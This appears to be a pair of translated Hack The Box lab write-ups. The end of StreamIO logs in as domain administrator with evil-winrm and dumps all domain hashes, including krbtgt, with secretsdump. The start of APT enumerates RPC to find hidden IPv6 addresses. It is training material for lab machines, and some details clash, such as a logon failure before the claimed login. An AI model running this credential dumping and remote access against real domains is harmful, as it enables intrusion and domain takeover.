SMB streamio.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB streamio.htb 445 DC [-] DC\administrator:7hcr@&{jI91l7M STATUS_LOGON_FAILURE
We have obtained the domain administrator's credentials.
Try connecting:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u administrator -p '7hcr@&{jI91l7M' -i streamio.htb
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
streamio\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/22/2022 1:33 AM 3D Objects
d-r--- 2/22/2022 1:33 AM Contacts
d-r--- 5/30/2022 4:53 PM Desktop
d-r--- 2/26/2022 12:41 PM Documents
d-r--- 2/22/2022 1:33 AM Downloads
d-r--- 2/22/2022 1:33 AM Favorites
d-r--- 2/22/2022 1:33 AM Links
d-r--- 2/22/2022 1:33 AM Music
d-r--- 2/22/2022 1:33 AM Pictures
d-r--- 2/22/2022 1:33 AM Saved Games
d-r--- 2/22/2022 1:33 AM Searches
d-r--- 2/22/2022 1:33 AM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:48 AM .NET v4.5
d----- 2/22/2022 2:48 AM .NET v4.5 Classic
d----- 2/26/2022 10:20 AM Administrator
d----- 5/9/2022 5:38 PM Martin
d----- 2/26/2022 9:48 AM nikk37
d-r--- 2/22/2022 1:33 AM Public
*Evil-WinRM* PS C:\Users> cd martin
*Evil-WinRM* PS C:\Users\martin> cd desktop
*Evil-WinRM* PS C:\Users\martin\desktop> ls
Directory: C:\Users\martin\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/29/2024 2:54 AM 34 root.txt
*Evil-WinRM* PS C:\Users\martin\desktop> type root.txt
b97157078aa375824e9cf9d9ac12c8eb
With that, we finally have the Administrator's flag.
An extra small verification
So, how do we further verify that what we took over is really a domain controller? We know that once a domain controller is taken, hash passing becomes possible, that is, all the hashes in the domain can be dumped:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# /usr/share/doc/python3-impacket/examples/secretsdump.py 'streamio.htb/administrator:7hcr@&{jI91l7M'@streamio.htb
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4dbf07084a530cfa7ab417236bd4a647
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6a559f691b75bff16a07ecbd12e3bdfb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
streamIO\DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def
streamIO\DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33
streamIO\DC$:des-cbc-md5:380bb370c7236ec8
streamIO\DC$:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd8b78bca07d4bce21bce1ae04bf231978c84407f
dpapi_userkey:0x9b682d0f5f9b63c03827113581bc2dc4f993e3ee
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e8888d458703384be8f16508b9f9cc84:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::
[*] Kerberos keys grabbed
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
...
Summary
(to be written up during the review)
APT
“红队笔记” (Red Team Notes) study notes
Machine description
APT is an insane difficulty Windows machine where RPC and HTTP services are only exposed. Enumeration of existing RPC interfaces provides an interesting object that can be used to disclose the IPv6 address. The box is found to be protected by a firewall exemption that over IPv6 can give access to a backup share. User enumeration and bruteforce attacks can give us access to the registry which contains login credentials. The machine is configured to allow authentication via the NTLMv1 protocol, which can be leveraged to gain system access.
Difficulty
Insane
Information gathering
TCP full port scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 14:59 CST
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
Nmap done: 1 IP address (1 host up) scanned in 46.32 seconds
Processing the result:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports=$(grep open nmapscan/tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports
80,135
TCP detailed scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT -sC -sV -O -p80,135 $ip1 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:05 CST
Nmap scan report for 10.129.96.60
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds
UDP scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sU -p- --min-rate 10000 10.129.96.60 -oA nmapscan/udports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:10 CST
Nmap scan report for 10.129.96.60
Host is up (0.14s latency).
All 65535 scanned ports on 10.129.96.60 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 14.26 seconds
The scan turned up nothing.
Script vulnerability scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap --script=vuln -p80,135 10.129.96.60 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:08 CST
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 15:10 (0:00:02 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:12 (0:00:01 remaining)
Stats: 0:06:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:14 (0:00:02 remaining)
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.96.60
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.96.60:80/support.html
| Form id:
|_ Form action: https://10.13.38.16/contact-post.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp open msrpc
Nmap done: 1 IP address (1 host up) scanned in 741.60 seconds
Analysis of the scan results
The results we got are very limited; clearly the web service on port 80 should be examined first for potential vulnerabilities, and msrpc considered last.
Exploitation
Trying the web service
After clicking through many of the site's features, we found that they all redirect to the homepage, which shows the site is still at a planning stage and not finished, just a demo. It looks like it was built with some CMS framework, and most of it is purely static with nothing to exploit, except for SUPPORT:
We find that the form data is submitted to a different IP address, which suggests that there may be more than one device on the internal network:
In this situation there is little point in trying SQL injection, XSS and the like, so we set this aside for now.
Directory brute-forcing
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# gobuster dir -u http://10.129.96.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.96.60
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 150] [--> http://10.129.96.60/images/]
/Images (Status: 301) [Size: 150] [--> http://10.129.96.60/Images/]
/css (Status: 301) [Size: 147] [--> http://10.129.96.60/css/]
/js (Status: 301) [Size: 146] [--> http://10.129.96.60/js/]
/fonts (Status: 301) [Size: 149] [--> http://10.129.96.60/fonts/]
/IMAGES (Status: 301) [Size: 150] [--> http://10.129.96.60/IMAGES/]
/Fonts (Status: 301) [Size: 149] [--> http://10.129.96.60/Fonts/]
/CSS (Status: 301) [Size: 147] [--> http://10.129.96.60/CSS/]
/JS (Status: 301) [Size: 146] [--> http://10.129.96.60/JS/]
===============================================================
Finished
===============================================================
Nothing special was found, and we have no permission to access these directories either.
Viewing the source
Since we guessed the site might be built on some CMS, the source could expose information, especially in comments. From what we see, however, this is not a CMS: the site was mirrored from the other IP address we saw earlier, and the tool used to mirror it is exposed. Clearly the next step is to check whether that tool has any public vulnerabilities.
Searching for public vulnerabilities
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website Copier
Exploits: No Results
Shellcodes: No Results
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website
Exploits: No Results
Shellcodes: No Results
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack
Exploits: No Results
Shellcodes: No Results
Searching:
Clearly this mirroring tool has had vulnerabilities; let's look at the details.
But we learn that the tool is a binary program, not something exposed on the web, and the binary exposes no port we could interact with, so the buffer overflow and DLL hijacking vulnerabilities among the public ones cannot be exploited for now. This attack path does not work, and there is no point wasting time reproducing it.
Checking the images for hidden (steganographic) information
Since we have tried all the usual approaches without finding anything useful, we can download the site's images and see whether they hide anything.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/p2.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool p2.jpg
ExifTool Version Number : 12.76
File Name : p2.jpg
Directory : .
File Size : 28 kB
File Modification Date/Time : 2019:09:06 01:58:48+08:00
File Access Date/Time : 2024:03:02 16:31:45+08:00
File Inode Change Date/Time : 2024:03:02 16:31:45+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Resolution Unit : None
X Resolution : 100
Y Resolution : 100
Quality : 60%
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 370
Image Height : 247
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 370x247
Megapixels : 0.091
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings p2.jpg
...
Still nothing of value. While looking around, one image seemed a bit suspicious:
The text appearing there looks odd, like some kind of hint, and the file name also seems to carry a particular meaning.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/outsource.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool outsource.jpg
ExifTool Version Number : 12.76
File Name : outsource.jpg
Directory : .
File Size : 1779 kB
File Modification Date/Time : 2019:12:23 19:36:32+08:00
File Access Date/Time : 2024:03:02 16:35:26+08:00
File Inode Change Date/Time : 2024:03:02 16:35:26+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 300
Y Resolution : 300
Image Width : 1920
Image Height : 1152
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1920x1152
Megapixels : 2.2
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings outsource.jpg
...
Still nothing special. For now there is nothing to gain here, so we set this port aside, though we may need to come back to it once we have more information.
Trying to connect to msrpc
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N 10.129.96.60
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N -p 135 10.129.96.60
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
Since this tool connects to port 139 by default, we tried both ways; neither could connect.
Trying to exploit msrpc
To work with this service, we can try the important tools from the Python 3 impacket library.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# echo $PATH
/usr/share/doc/python3-impacket/examples:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/root/.local/bin:/root/.local/bin
This library is very important in a penetration test for deep scanning and exploitation of the basic protocols, and many of its tools appear repeatedly during exploitation. Here is the official description of it:
See also: https://www.coresecurity.com/core-labs/open-source-tools/impacket
Note that "low-level" here means the underlying protocol layer; it is very important, not low in quality. It accesses these protocols' packets at the lowest level. Let's start using it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcdump.py 10.129.96.60
...
rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
This tool only lists the DCOM components and methods running under the RPC protocol on port 135, but we do not know what they actually do. That is where rpcmap comes in: it is finer-grained than rpcdump, mapping out the specifics of DCOM and enumerating it in depth.
rpcmap.py: Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.
DCOM (Distributed Component Object Model) is a set of Microsoft concepts and program interfaces in which client program objects can request services from server program objects on other computers in a network.
Brute-forcing interface UUIDs and opnums
This is unfamiliar to us, but that is normal; unfamiliar technology comes up often during a penetration test. All we want to know now is what the UUIDs in this result are and which services or interfaces are running behind them. We can try brute-forcing them with rpcmap:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcmap.py ncacn_ip_tcp:10.129.96.60[135] -brute-uuids -brute-opnums
...
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Opnum 0: rpc_x_bad_stub_data
Opnum 1: rpc_x_bad_stub_data
Opnum 2: rpc_x_bad_stub_data
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnum 5: success
Opnums 6-64: nca_s_op_rng_error (opnum not found)
Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Opnum 0: success
Opnum 1: rpc_x_bad_stub_data
Opnum 2: success
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnums 5-64: nca_s_op_rng_error (opnum not found)
...
Apart from those listed above, everything else returned rpc_s_access_denied or could not be brute-forced, which tells us nothing.
Try searching for these two UUIDs:
This already shows the corresponding interface names. Let's look at the details of that interface; the corresponding methods for calling it are given here too:
Looking for a way to exploit it
Looking closely, these methods have their own opnums, which match exactly the results of our brute-forcing above, so we should focus on exploiting the third and fifth methods, of which the fifth is an extension of the other. But this information comes from Microsoft's official documentation, which will not provide exploitation details, so we should search further:
Indeed, someone wanted to call this method just as we do, and provided a tool for it:
Searching further:
In the article below we found the details of exploiting this resolver:
The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication
https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/
This article series will be composed of two parts:
The first part will explain how to achieve a remote enumeration of network interfaces on a Windows OS machine without any authentication. We will show that this is done from a RPC method which is held by the IOXIDResolver interface. This interface is part of the DCOM remote object activation. A python script and the methodology to implement such a tool in native code will be delivered.
The second part will explain why such RPC is used inside a DCOM environment. This involves diving into the OXID Resolver component. The latter requires to understand some DCOM concepts such as transparency, marshalling and object reference. This part will be described in the next blog post.
Resolving the hidden IPv6 addresses
Skimming the article, the situation is very similar to ours. The tool used there comes from https://github.com/mubix/IOXIDResolver; let's try it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -h
IOXIDResolver.py -t <target>
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::10b
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::f9e3:e61a:564f:3e8a
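To make clear where these addresses come from, here is a decoder for the DUALSTRINGARRAY that the ServerAlive2 reply carries, added as an example and not taken from IOXIDResolver.py or impacket; the sample reply is constructed from the addresses above, and the tower and authentication-service constants are the MS-DCOM/RPC values rather than anything shown on this page.

```python
"""Decode the DUALSTRINGARRAY that IObjectExporter::ServerAlive2 returns,
which is where IOXIDResolver.py gets the address list shown above.
Added example, not the mubix script or impacket. It follows the MS-DCOM
layout (DUALSTRINGARRAY -> STRINGBINDINGs, then SECURITYBINDINGs) and works
on the structure body only, not the NDR pointer/array wrapping on the wire."""
import ipaddress
import struct

# Tower IDs from MS-DCOM; 0x07 (ncacn_ip_tcp) is what the output above carries.
TOWER_NAMES = {0x07: "ncacn_ip_tcp", 0x08: "ncadg_ip_udp", 0x1F: "ncacn_http"}


def _wstr(s):
    """Null-terminated UTF-16LE string, as used in both binding types."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_dualstringarray(string_bindings, security_bindings):
    """Encode (tower_id, address) and (authn_svc, principal) lists.

    Used here only to construct offline test input; a real reply comes from
    the resolver on port 135 of the target.
    """
    body = b"".join(struct.pack("<H", t) + _wstr(a) for t, a in string_bindings)
    body += b"\x00\x00"                        # terminates the STRINGBINDING list
    sec_off = len(body) // 2                   # wSecurityOffset is counted in WCHARs
    body += b"".join(struct.pack("<HH", svc, 0xFFFF) + _wstr(p)   # Reserved = 0xFFFF
                     for svc, p in security_bindings)
    body += b"\x00\x00"                        # terminates the SECURITYBINDING list
    return struct.pack("<HH", len(body) // 2, sec_off) + body


def _read_wstr(buf, off):
    """Read a null-terminated UTF-16LE string at byte offset off."""
    end = off
    while True:
        if end + 2 > len(buf):
            raise ValueError("unterminated string in DUALSTRINGARRAY")
        if buf[end:end + 2] == b"\x00\x00":
            return buf[off:end].decode("utf-16-le"), end + 2
        end += 2


def parse_dualstringarray(data):
    """Return {"string_bindings": [(tower, addr)], "security_bindings": [(svc, princ)]}."""
    if len(data) < 4:
        raise ValueError("truncated DUALSTRINGARRAY header")
    num, sec_off = struct.unpack_from("<HH", data, 0)
    arr = data[4:4 + num * 2]
    if len(arr) != num * 2 or sec_off > num:
        raise ValueError("truncated DUALSTRINGARRAY")

    string_bindings, off = [], 0
    while off + 2 <= sec_off * 2:
        tower = struct.unpack_from("<H", arr, off)[0]
        if tower == 0:                         # end marker of the list
            break
        addr, off = _read_wstr(arr, off + 2)
        string_bindings.append((tower, addr))

    security_bindings, off = [], sec_off * 2
    while off + 2 <= len(arr):
        svc = struct.unpack_from("<H", arr, off)[0]
        if svc == 0:
            break
        princ, off = _read_wstr(arr, off + 4)  # skip the Reserved WORD
        security_bindings.append((svc, princ))
    return {"string_bindings": string_bindings,
            "security_bindings": security_bindings}


def classify_addresses(string_bindings):
    """Split the advertised addresses by family; the IPv6 entries are the
    information the write-up builds on."""
    out = {"ipv4": [], "ipv6": [], "hostname": []}
    for _, addr in string_bindings:
        try:
            out["ipv6" if ipaddress.ip_address(addr).version == 6 else "ipv4"].append(addr)
        except ValueError:
            out["hostname"].append(addr)
    return out


# Constructed reply mirroring the IOXIDResolver output above
# (10 = RPC_C_AUTHN_WINNT, 16 = RPC_C_AUTHN_GSS_KERBEROS, empty principal names).
SAMPLE_REPLY = build_dualstringarray(
    [(0x07, "apt"), (0x07, "10.129.96.60"), (0x07, "dead:beef::10b"),
     (0x07, "dead:beef::b885:d62a:d679:573f")],
    [(10, ""), (16, "")],
)

if __name__ == "__main__":
    parsed = parse_dualstringarray(SAMPLE_REPLY)
    for tower, addr in parsed["string_bindings"]:
        print(f"{TOWER_NAMES.get(tower, hex(tower))}: {addr}")
    print(classify_addresses(parsed["string_bindings"]))
```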
Information gathering
Looking at the result, the resolver has revealed the target's IPv6 addresses! This is important information; next we need to verify that these IPv6 addresses are valid, so first save them. We can scan these new addresses with nmap, with the same approach as regular port scanning:
IPv6 TCP full port scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:17 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.38s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49675/tcp open unknown
49698/tcp open unknown
54047/tcp open unknown
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports6=$(grep open nmapscan/6tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports6
53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047
IPv6 TCP detailed scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -sT -sC -sV -O -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:27 CST
sendto in send_ipv6_ipproto_raw: sendto(10, packet, 80, 0, dead:beef::b885:d62a:d679:573f, 28) => Operation not permitted
Offending packet: ICMPv6 (58) dead:beef:2::100d > dead:beef::b885:d62a:d679:573f (type=128/code=0) hopl=55 flow=12345 payloadlen=40
Unable to send packet in probe_transmission_handler: Operation not permitted (1)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-07 08:27:29Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2024-03-07T08:28:40+00:00; -28s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
54047/tcp open msrpc Microsoft Windows RPC
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Vista|7|2008 R2|2012 R2 (96%)
OS CPE: cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2012:r2
OS fingerprint not ideal because: Some probes failed to send so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -27s, deviation: 1s, median: -27s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-03-07T08:28:26
|_ start_date: 2024-03-07T05:58:50
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2024-03-07T08:28:27+00:00
IPv6 UDP port scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -sU --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6udports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:23 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.18s latency).
All 65535 scanned ports on dead:beef::b885:d62a:d679:573f are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
IPv6 script vulnerability scan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --script=vuln -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:35 CST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 16:38 (0:00:00 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.24s latency).
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
